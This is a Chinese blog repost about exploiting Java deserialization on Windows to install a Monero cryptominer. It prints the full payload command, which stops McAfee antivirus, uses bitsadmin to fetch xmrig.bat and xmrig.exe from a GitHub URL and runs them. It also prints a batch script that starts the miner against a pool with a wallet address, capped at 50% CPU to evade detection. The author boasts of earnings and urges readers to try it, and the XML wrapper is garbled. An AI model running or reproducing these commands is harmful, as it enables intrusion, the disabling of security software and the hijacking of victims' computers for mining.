博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
利用Java反序列化漏洞在Windows上的挖矿实验
阅读量:3730 次
发布时间:2019-05-22

本文共 1883 字,大约阅读时间需要 6 分钟。

最近,安全社区中有很多人都在讨论如何利用Java反序列化漏洞来攻击类似Apache、SOLR和WebLogic之类的系统。不说废话,我们直接进入正题。目前绝大多数的此类攻击针对的都是Linux/Unix系统,但是我近期发现了一种针对Windows系统的攻击方法。

PS:本文仅用于技术讨论与分享,严禁用于非法用途

攻击代码如下:

    
       
     
          
      
             
       
                
        
                   
         
                      
          
                         
           
            cmd
                       
                      
          
                         
           
            /c
                       
                      
          
                         
           
            net stop"McAfee McShield;net stop mcafeeframework;bitsadmin.exe /transfer"xmrig.bat" /download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.bat"%cd%\xmrig.bat";bitsadmin.exe /transfer "xmrig.exe"/download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.exe"%cd%\xmrig.exe;dir xmrig*;xmrig.bat;tasklist;
                       
                              
                        
         
        
             
      
      

实际的Payload分析

关闭McAfee反病毒软件(我不明白社区中的这种技术为啥只关掉McAfee…):

netstop "McAfee McShield;netstop mcafeeframework;

使用bitsadmin从GitHub下载加密货币挖矿程序和一个batch脚本文件:

bitsadmin.exe/transfer "xmrig.bat" /download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.bat"%cd%\xmrig.bat";bitsadmin.exe/transfer "xmrig.exe" /download /priority foreground http://raw.githubusercontent.com/sirikun/starships/master/xmrig.exe"%cd%\xmrig.exe;dirxmrig*;xmrig.bat;tasklist;

Batch脚本文件代码如下:

taskkill/im /f xmrig.exe /tnetstop "McAfee McShield"netstop mcafeeframeworkxmrig.exe-o monerohash.com:3333 -u 42jF56tc85UTZwhMQc6rHbMHTxHqK74qS2zqLyRZxLbwegsy7FJ9w4T5B69Ay5qeMEMuvVDwHNeopAxrEZkkHrMb5phovJ6-p x --background --max-cpu-usage=50 --donate-level=1

首先,上述代码会终止其他xmrig进程(可能是为了防止资源竞争)。接下来,它会关闭McAfee。然后便会开启挖矿程序,并跟monerohash.com矿池(端口3333)进行连接。它只会占用大约50%的CPU资源,估计是为了避免被检测到吧。

目前为止,这个挖矿程序的计算能力只能实现350哈希每秒,并为我挖到了40个门罗币(价值约为7000美元)。

感兴趣的同学可以自己动手试一试,说不定会有一些意想不到的收获。

* 参考来源:,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

已有 3 条评论

  • 提莫
     2018-04-22
    1楼

    请问是什么安全社区

    ( 0)
  • sss1k
     2018-04-22
    2楼

    得多少台机才能挖到40个门罗价值7000美元, 已经在利用漏洞扩散恶意代码了吧

    ( 2)
  • HelloKitty
     2018-04-23
    3楼

    实验不错,就是时间有点长。。。改天我也实验一下

    ( 0
你可能感兴趣的文章
shell遍历文件夹及去掉文件后缀名
查看>>
shell命令执行hive脚本
查看>>
Hive分区+根据分区查询
查看>>
shell按分隔符截取字符串
查看>>
hive插入分区报错SemanticException Partition spec contains non-partition columns
查看>>
hive清空表删除分区
查看>>
Hive统计日首次登陆游戏的用户数
查看>>
Hive去重统计
查看>>
Hive的桶表
查看>>
Flume概述安装及实操
查看>>
Sqoop概述安装及实操
查看>>
干货:解码OneData,阿里的数仓之路
查看>>
数据孤岛浅谈
查看>>
数据湖详解
查看>>
数据仓库和数据集市的概念、区别与联系
查看>>
Zookeeper概述安装及实操
查看>>
Hadoop完全分布式搭建
查看>>
List小练习之统计字母数
查看>>
List小练习之随机生成十个不重复数存入
查看>>
List小练习之存入对象排序并打印
查看>>
喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!-- 愿君每日到此一游!
当前时间: 2024-09-15 11:40:15   当前IP: 18.188.110.169   联系邮箱:javaeecc@qq.com     Copyright © 2020 - 2022 baihongyu.com 京ICP备2021015314号-2
强烈建议你试试无所不能的CHAT-GPT,快点击我
强烈建议你试试无所不能的CHAT-GPT,快点击我